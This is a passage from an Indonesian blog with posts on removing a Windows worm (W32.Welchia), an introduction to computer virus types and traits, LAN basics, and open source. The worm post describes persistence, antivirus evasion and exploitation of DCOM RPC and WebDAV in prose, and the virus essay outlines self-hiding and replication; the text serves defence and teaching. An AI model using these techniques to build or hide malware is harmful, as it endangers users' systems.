mengkopikan dirinya,secara default adalah C:\Winnt\System32 (Windows 2000)
atau

C:\Windows\System32 (Windows XP).membuat kopi file
%System%\Dllcache\Tftpd.exe sebagai %System%\Wins\svchost.exe.

catatan:Tftpd adalah program yang diijinkan, sehingga sulit untuk dideteksi
oleh antivirus.

menambah subkeys:
RpcPatch

dan:

RpcTftpd

ke registry key di:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services


Membuat beberapa services:

Nama Service : RpcTftpd
Service Display Name: Network Connections Sharing
Service Binary: %System%\wins\svchost.exe

Service ini akan diset untuk berjalan secara manual.

Nama Service : RpcPatch
Service Display Name: WINS Client
Service Binary: %System%\wins\dllhost.exe

Service ini akan di set untuk dapat berjalan secara otomatis.
Proses terakhir adalah menghapus file %System%\msblast.exe sebagai tempat
pertama kali W32.Blaster.Worm


worm ini melakukan:
- mengirimkan packet ICMP /ping , untuk mengecek apakah komputer denga ip
tersebut aktif di jaringan.
- Setelah worm berhasil mengetahui bahwa mesin tersebut aktif di jaringan
maka akan mengirimkan data ke port tcp 135 dan akan mengeksploitasi
kelemahan DCOM RPC
atau,
akan mengirim date ke port tcp 80 untuk mengeksploitasi kelemahan Webdav
- membuat shell untuk remote pada mesin yang telah di ekspoitasi
kelemahannya dan akan mencoba terhubung ke mesin penyerang dengan
menggunakan prot tcp secara acak, antara 666 dan 765 untuk menerima
instruksi.
- Menjalankan server TFTP pada mesin penyerang dan menginstruksikan mesin
yang tereksploitasi (korban) untuk terhubung dan mendownload Dllhost.exe
dan Svchost.exe dari mesin penyerang. jika file
%System%\dllcache\tftpd.exe ada, maka worm tidak akan mendownload
svchost.exe.
- memeriksa versi Sistem operasi komputer tersebut, Nomor Service pack
dan juga menghalangi untuk terhubung ke Microsoft's Windows Update dan
mencegah komputer untuk DCOM RPC vulnerability patch.

Untuk memusnahkan worm ini dapat dilakukan beberapa cara:
+ Gunakan peralatan removal W32.Welchia.WOrm
+ Menghapus secara manual:
1 menDisable System Restore (Windows XP).
mengapa? XP kuhusnya secara default mengenable system restore,
mengapa berbahaya? karena virus, worm atau trojan yang menginfeksi
komputer anda mungkin saja di backup juga oleh system restore dan yang
membuat lebih berbahaya adalah windows melindungi program lain,termasuk
antivirus untuk memodifikasi (menquarantine, menghapus dan membersihkan)
sytem restore=system restore bisa jadi tempat teraman bagi virus dkk.
karena itu anda wajib men-disablekan system restore anda

untuk mematikan system restore:
- anda harus sebagaoi administrator (xp)
- masuk ke control panel
- pilih system, di system properties pilih System restore
- centang turn off system restore


2 Update virus definition dari antivirus yang digunakan. anda hanya perlu
mengunjungi situs antivirus anda, atau menjalankan Live Update langsung
dari program antivirus anda untuk melaukan update.

3 Restart komputer anda dalam save mode untuk menghentikan Worm.
untuk windows 95/98/me anda bisa masuk ke save mode setelah restart
sedangkan,
untuk xp/nt/win 2000
anda dapat menghentikan kerja virus buat sementara dengan cara:
-masuk control panel
-pilih services pada administrative tools
-scroll kebawah sampai anda temukan
+ Network Connections Sharing
+ WINS Client
-klik-kanan dan pilih stop

4 jalankan full system scan dan delete semua file yang dideteksi sebagai
W32.Welchia.Worm.jalankan full scan dan konfigurasi terlebih dahulu
antivirus anda jika ditemukan ada file yang terinfeksi W32.Welchia.Worm
maka hapus file tersebut

5 Delete values& subkeys yang dibuat oleh virus di registry.
hal ini sedikit beresiko, sebelum anda lakukan, backup dulu registry anda

-klik start -run dan ketik regedit
masuk ke key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

hapus subkey berikut:

RpcPatch

dan

RpcTftpd
simpan perubahan dan keluar dari registry

6 Delete Svchost.exe file.
masuk ke folder %system%wins dan hapus semua file svchost.exe

Selengkapnya.....

penak-pernik tentang virus

Written by ferry89 on 23.15

" A program that can infect other programs by modifying them to include
a slighty altered copy of itself. A virus can spread throughout a computer
system or network using the authorization of every user using it to infect
their programs. Every programs that gets infected can also act as a virus
that infection grows:: Fred Cohen"

pengantar
-----------------

Apakah Kalian pernah mendengar apa itu virus, tahukah kalian apa yang
dimaksud virus itu disini aku akan coba mengartikan apa itu virus.
virus yang lebih dikenal dalam istilah kedokteran atau arti virus sebagai
biological virusses" inipun ternyata populer juga di dunia yang terdiri dari
elektron ini. hal ini terjadi dikarenakan kemiripan dalam mekanisme
penyebarannya.

Virus komputer bisa diartikan secara gamblang adalah suatu program komputer
biasa. tetapi memiliki perbedaan yang mendasar dengan program-program
lainnya,yaitu dia dibuat untuk menulari program program lainnya, mengubah,
memanipulasinya bahkan sampai merusaknya.

tetapi ada yang perlu dicatat disini, virus hanya akan menulari apabila
program pemicu atau program yang telah terinfeksi tadi dieksekusi,
disinilah perbedaannya dengan "worm". Aku tidak akan mencoba membahas worm
karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.

asal muasal virus
-----------------

1949, John Von Neuman, menggungkapkan "teori self altering automata"
yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang
diungkapkan oleh john v neuman, mereka bermain-main dengan teori tersebut
untuk suatu jenis permainan/game. Para ahli tersebut membuat program yang
dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan.
Program yang mampu bertahan dan menghancurkan semua program lain, maka akan
dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan
favorit ditiap-tiap lab komputer.semakin lama mereka pun sadar dan mulai
mewaspadai permainan ini dikarenakan program yang diciptakan makin lama makin
berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yangketat.

1980, program tersebut yang akhirnya dikenal dengan "virus" ini berhasil
menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber.

1980, mulailah dikenal virus virus yang menyebar di dunia cyber.


Jenis-Jenis Virus
-----------------

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba
memberikan penjelasan tentang jenis jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
--------------
Aku rasa kita semua sudah sangat sering mendengar tentang virus ini. Virus ini
ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada komputer
mac dapat menjalankan aplikasi word maka virus ini bekerja pada komputer
bersistem operasi Mac.
contoh virus:
-variant W97M, misal W97M.Panther panjang 1234 bytes,akanmenginfeksi NORMAL.DOT
dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW :: 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan
bahasa makro, biasanya berekstensi *.DOT dan *.DOC
-dll

makanya tulisan ini aku gak ketik di word (:p)

2.Virus Boot Sector
--------------------
Virus Boot sector ini sudah umum sekali menyebar (terus terang hardiskku sering
diformat gara gara virus ini :P, tapi karena itu aku sobatan ma dia, :)).
Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot
sector asli dengan program booting virus. Sehingga saat terjadi booting maka
virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan
mengendalikan hardware standar(ex::monitor, printer dsb) dan dari memori ini
pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer
(ex: floopy, drive lain selain c:\)
contoh virus ::
-varian virus wyx (langganan gwa nih :) ex: wyx.C(B) menginfeksi boot record dan
floopy ; panjang :520 bytes; karakteristik : memory resident dan terenkripsi)
-varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy;
panjang 520 bytes; karakteristik: menetap di memori (memory resident),
terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" stelah komputer
melakukan booting sebanyak 128 kali)

3.Stealth Virus
----------------
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendaikan
nstruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928, menginfeksi file *.COM dan *.EXE ; panjang 4298 bytes;
karakteristik: menetap di memori, ukuran tersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy dan motherboot record; panjang
520 bytes;menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s): menginfeksi file file *.EXE, *.SYS, dan *.COM ; panjang fie 3275
bytes; karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
-------------------
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.
contoh virus:
-Necropolis A/B, menginfeksi file *.EXE dan *.COM; panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
apat berubah ubah struktur
-Nightfall, menginfeksi file *.EXE; panjang file 4554 bytes; karakteristik :
menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsi
dan dapat berubah ubah struktur
-dll

5.Virus File/Program
--------------------
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi dari
virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

6.Multi Partition Virus
-----------------------
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinyapekerjaan
yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file file *.EXE dan juga
menginfeksi Boot Sector.

Kriteria Virus
--------------

Suatu virus , dapat dikatakan adalah benar benar virus apabila minimal memiliki 5
kriteria (kriteria ini aku dapatkan dari sebuah sumber terpercaya :))
1.kemampuan suatu virus untuk mendapatkan informasi
2.kemampuannya untuk memeriksa suatu program
3.kemampuannya untuk menggandakan diri dan menularkan
4.kemampuannya melakukan manipulasi
5.kemampuannya untuk menyembunyikan diri.


Sekarang akan aKu coba jelaskan dengan singkat apa yang dimaksud dengan tiap-tiap
kemampuan itu dan mengapa ini sangat diperlukan.

Kemampuan untuk mendapatkan informasi
-------------------------------------
Pada umumnya suatu virus memerlukan daftar nama nama file yang ada dalam suatu
directory, untuk apa? agar dia dapat mengenali program program apa saja yang akan
dia tulari, semisal virus makro yang akan menginfeksi semua file berekstensi *.doc
setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu
diperlukan agar virus dapat membuat daftar/dat semua file terus memilah dengan
mencari file file yang bisa ditulari. Biasanya data ini tercipta saat program yang
tertular atau terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan
segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya :P ) ,
sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap
program bervirus dijalankan biasanya dibuat hidden oleh virus (agar gak keliatan).

Kemampuan memeriksa suat program
--------------------------------
Suatu virus juga sangat amat harus (berlebihan gak ya :P) bisauntuk memeriksa suatu
program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc,
dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,karena
jika sudah maka dia akan percuma menularinya 2 kali (virus aja perhitungan coba,:)).
Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan
menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah memiliki/memberi
tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh
virus tersebut.Contoh penandaan adalah misalnya memberikan suatu byte yang unik
disetiap file yang telah terinfeksi.

Kemampuan untuk menggandakan diri
---------------------------------
Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus. inti dari
virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu
virus apabila telah menemukan calon korbannya (baik file atau program) maka
ia akan mengenalinya dengan memeriksanya,jika belum terinfeksi maka sang virus akan
memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/
file tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatasfile/program
yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/
menggandakan dirinya adalah:

a.File/Program yanga akan ditulari dihapus atau diubah namanya. kemudian diciptakan
suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus
mengganti namanya dengan nama file yang dihapus)
b.Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file
file lain dengancara menumpangi seluruh file/program yang ada.

Kemampuan mengadakan manipulasi
-------------------------------
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari
suatu file/program. isi dari suatu rutin ini dapat beragam mulai dari yang teringan
sampai pengrusakan. rutin ini umumnya digunain buat memanipulasi program ataupun
mempopulerkan pembuatnya! (:P) Rutin ini memanfaatkan kemampuan dari suatu sistem
operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang
dimiliki sistem operasi.
misal:
a.Membuat gambar atau pesan pada monitor
b.mengganti/mengubah ubah label dari tiap file,direktori,atau label dari drive di pc
c.memanipulasi program/file yang ditulari
d.merusak program/file
e.Mengacaukan kerja printer , dsb

Kemampuan Menyembunyikan diri
------------------------------
Kemampuan Menyembunyikna diri ini harus dimiliki oleh suatu virus agar semua pekerjaan
baik dari awal sampai berhasilnya penularan dapat terjlaksana.
langkah langkah yang biasa dilakukan adalah:
-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan program lain
yang dianggap berguna oleh pemakai.
-Program virus diletakkan pada Boot Record atau track yang jarang diperhatikan oleh
komputer itu sendiri
-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah
ukurannya
-Virus tidak mengubah keterangan waktu suatu file
-dll

Selengkapnya.....

pengenalan jaringan LAN

Written by ferry89 on 23.12

Pengertian dan Prinsip Kerja LAN
================================

LAN dapat definisikan sebagai network atau jaringan sejumlah sistem
komputer yang lokasinya terbatas didalam satu gedung, satu kompleksgedung
atau suatu kampus dan tidak menggunakan media fasilitas komunikasi umum
seperti telepon, melainkan pemilik dan pengelola media komunikasinya
adalah pemilik LAN itu sendiri.
Dari definisi diatas dapat kita ketahui bahwa sebuah LAN dibatasi oleh
lokasi secara fisik. Adapun penggunaan LAN itu sendiri mengakibatkansemua
komputer yang terhubung dalam jaringan dapat bertukar data atau dengan
kata lain berhubungan. Kerjasama ini semakin berkembang dari hanya
pertukaran data hingga penggunaan peralatan secara bersama.
LAN yang umumnya menggunakan hub, akan mengikuti prinsip kerja hub itu
sendiri. Dalam hal ini adalah bahwa hub tidak memiliki pengetahuantentang
alamat tujuan sehingga penyampaian data secara broadcast, dan juga karena
hub hanya memiliki satu domain collision sehingga bila salah satu port
sibuk maka port-port yang lain harus menunggu.



Komponen-komponen Dasar LAN
===========================

Beberapa komponen dasar yang biasanya membentuk suatu LAN adalah sebagai
berikut:

•Workstation
------------
Workstation merupakan node atau host yang berupa suatu sistem komputer.
Sistem komputer ini dapat berupa PC atau dapat pula berupa suatu komputer
yang besar seperti sistem minicomputer, bahkan suatu mainframe.
Workstation dapat bekerja sendiri (stand-alone) dapat pula menggunakan
jaringan untuk bertukar data dengan workstation atau user yang lain.

•Server
-------
Perangkat keras (hardware) yang berfungsi untuk melayani jaringan dan
workstation yang terhubung pada jaringan tersebut.pada umumnya sumber
daya (resources) seperti printer, disk, dan sebagainya yang hendak
digunakan secara bersama oleh para pemakai di workstation berada dan
bekerja pada server. Berdasarkan jenis pelayanannya dikenal disk server,
file server, print server, dan suatu server juga dapat mempunyai beberapa
fungsi pelayanan sekaligus.

•Link (hubungan)
----------------
Workstation dan server tidak dapat berfungsi apabila peralatan tersebut
secara fisik tidak terhubung. Hubungan tersebut dalam LAN dikenal sebagai
media transmisi yang umumnya berupa kabel. Adapun beberapa contoh dari
link adalah:
1.Kabel Twisted Pair
•Kabel ini terbagi dua, yaitu Shielded Twisted Pair dan Unshielded Twisted
Pair(UTP)
•Lebih banyak dikenal karena merupakan kabel telpon
•Relatif murah
•Jarak yang pendek
•Mudah terpengaruh oleh gangguan
•Kecepatan data yang dapat didukung terbatas, 10-16 Mbps

2.Kabel Coaxial
•Umumnya digunakan pada televisi
•Jarak yang relatif lebih jauh
•Kecepatan pengiriman data lebih tinggi di banding Twisted Pair, 30 Mbps
•Harga yang relatif tidak mahal
•Ukurannya lebih besar dari Twisted Pair

3.Kabel Fiber Optic
•Jarak yang jauh
•Kecepatan data yang tinggi, 100 Mbps
•Ukuran yang relatif kecil
•Sulit dipengaruhi gangguan
•Harga yang relatif masih mahal
•Instalasi yang relatif sulit


•Network Interface Card (NIC)
-----------------------------
Suatu workstation tidak dihubungkan secara langsung dengan kabel jaringan
ataupun tranceiver cable, tetapi melalui suatu rangkaian elektronika yang
dirancang khusus untuk menangani network protocol yang dikenal dengan
Network Interface Card (NIC).

•Network Software
-----------------
Tanpa adanya software jaringan maka jaringan tersebut tidak akan bekerja
sebagaimana yang dikehendaki. Software ini juga yang memungkinkan sistem
komputer yang satu berkomunikasi dengan sistem komputer yang lain.

Peralatan Pendukung LAN
=======================

a.Repeater
------------
•Pada OSI, bekerja pada lapisan Physical
•Meneruskan dan memperkuat sinyal
•Banyak digunakan pada topologi Bus
•Penggunaannya mudah dan Harga yang relatif murah
•Tidak memiliki pengetahuan tentang alamat tujuan sehingga penyampaian
data secara broadcast
•Hanya memiliki satu domain collision sehingga bila salah satu port sibuk
maka port-port yang lain harus menunggu.

b.Hub
-----
•Bekerja pada lapisan Physical
•Meneruskan sinyal
•Tidak memiliki pengetahuan tentang alamat tujuan
•Penggunaannya relatif mudah dan harga yang terjangkau
•Hanya memiliki satu buah domain collision

c.Bridge
--------
•Bekerja di lapisan Data Link
•Telah menggunakan alamat-alamat untuk meneruskan data ke tujuannya
•Secara otomatis membuat tabel penterjemah untuk diterima masing2 port

d.Switch
--------
•Bekerja di lapisan Data Link
•Setiap port didalam swith memiliki domain collision sendiri-sendiri
•Memiliki tabel penterjemah pusat yang memiliki daftar penterjemah untuk
semua port
•Memungkinkan transmisi secara full duflex (dua arah)

e.Router
--------
•Router berfungsi menyaring atau memfilter lalu lintas data
•Menentukan dan memilih jalur alternatif yang akan dilalui oleh data
•Menghubungkan antar jaringan LAN, bahkan dengan WAN

Topologi LAN
=============

Pengertian topologi Jaringan adalah susunan lintasan aliran data didalam
jaringan yang secara fisik menghubungkan simpul yang satu dengan simpul
lainnya. Berikut ini adalah beberapa topologi jaringan yang ada dan
dipakai hingga saat ini, yaitu:
•Topologi Star
Beberapa simpul/node dihubungkan dengan simpul pusat/host, yang membentuk
jaringan fisik seperti bintang, semua komunikasi ditangani langsung dan
dikelola oleh host yang berupa mainframe komputer




•Topologi Hierarkis
Berbentuk seperti pohon bercabang yang terdiri dari komputer induk(host)
dihubungkan dengan simpul/node lain secara berjenjang. Jenjang yang lebih
tinggi berfungsi sebagai pengatur kerja jenjang dibawahnya.



•Topologi Bus
Beberapa simpul/node dihubungkan dengan jalur data (bus). Masing2 node
dapat melakukan tugas-tugas dan operasi yangberbeda namun semua mempunyai
hierarki yang sama.





•Topologi Loop
Merupakan hubungan antar simpul/node secara serial dalam bentuk suatu
lingkaran tertutup. Dalam bentuk ini tak ada central node/host, semua
mempunyai hierarki yang sama.




•Topologi Ring
Bentuk ini merupakan gabungan bentuk topologi loop dan bus, jika salah
satu simpul/node rusak, maka tidak akan mempengaruhi komunikasi node
yang lain karena terpisah dari jalur data.





•Topologi Web
Merupakan bentuk topologi yang masing-masing simpul/node dalam jaringan
dapat saling berhubungan dengan node lainnya melalui beberapa link.
Suatu bentuk web network dengan n node, akan menggunakan link sebanyak
n(n-1)/2.






Dengan menggunakan segala kelebihan dan kekurangan masing2 konfigurasi,
memungkinkan dikembangkannya suatu konfigurasi baru yang menggabungkan
beberapa topologi disertai teknologi baru agar kondisi ideal suatu
sistem jaringan dapat terpenuhi.

Selengkapnya.....

Sedikit tentang Open source

Written by ferry89 on 23.09

Bertahan di Era Open Source
============================

Open Source adalah sebuah sistem baru dalam mendistribusikan software kepada
pengguna dengan memberikan program dan source code nya secara gratis! Bahkan
pengguna dapat mempelajari dan melakukan modifikasi untuk membuat software
tersebut sesuai dengan kebutuhan mereka.

Richard M. Stallman,pendiri Free Software Foundation -sebuah organisasi yang
mendukung Open Source,mengeluarkan sebuah lisensi software untuk Open Source
yang dinamakan GPL (GNU Public License). Lisensi inilah yang saat ini paling
banyak digunakan untuk mendistribusikan software Open Source. Selain GPL,
masih banyak lisensi software lainnya yang dikembangkan oleh komunitas Open
Source.

Berikut adalah keuntungan software Open Source:

Sisi pengguna:

* Gratis
* Pengguna dapat terlibat dalam pengembangan program karena memiliki
* source code nya
* Respon yang baik dari pemakai sehingga bug dapat ditemukan dan
* diperbaiki dengan lebih cepat.

Sisi developer:

* Seluruh komunitas mau dan dapat membantu untuk membuat software anda
* menjadi lebih baik
* Tidak ada biaya iklan dan perawatan program
* Sebagai sarana untuk memperkenalkan konsep anda

Linux adalah sebuah contoh yang bagus. Banyak sistem operasi yang berusaha
meniru kisah sukses Linux, tetapi Linux tetap yang paling sukses hingga
saat ini. Aspek positif dari Open Source adalah penerimaan yang luas untuk
software yang benar-benar bagus. Tetapi keuntungan tersebut tidak cukup,
terutama untuk orang yang memang bekerja dengan membuat program
(programmer), mereka membutuhkan uang untuk melanjutkan pengembangan
software mereka (dan untuk makan tentunya).

ungkin beberapa dari pembaca berpikir, ini gila, jika kita membagi-bagikan
software kita dengan gratis, bagaimana kita dapat bertahan? Bagaimana kita
dapat menghasilkan uang?Tapi tunggu,ada beberapa cara yang dapat digunakan
untuk menghasilkan uang dari ekonomi Open Source ini. Tapi penting untuk
diketahui bahwa hanya software yang memang bagus yang dapat bertahan dan
menghasilkan uang, program yang jelek tidak dapat bertahan (kecuali anda
memaksa orang-orang untuk membelinya!).Berikut adalah beberapa diantaranya:

* Jual program dan source code dan manual book dalam sebuah box, program
* tersebut gratis jika pengguna mau mendownloadnya sendiri, tetapi
* pengguna harus membayar untuk mendapatkan produk komersialnya.
* Jual program tambahan yang memanfaatkan teknik tingkat tinggi program
* Open Source anda.
* Jual dukungan teknis untuk membantu pengguna menggunakan produk
* tersebut.
* Jual jasa untuk customize program sesuai dengan kebutuhan pengguna.
* Sisipan iklan pada software.
* Mencari sponsorship dari perusahaan yang berhubungan dengan software
* yang dibuat.

Itu adalah sebagian kecil contoh tentang bagaimana menghasilkan uang dari
software Open Source, seperti yang dapat anda bayangkan,Open Source tidak
hanya menguntungkan pengguna, tetapi juga menguntungkan bagi developer.
Saya rasa ini adalah solusi win-win. Jadi bagaimana pendapat anda?

Selengkapnya.....

Anda ingin beriklan....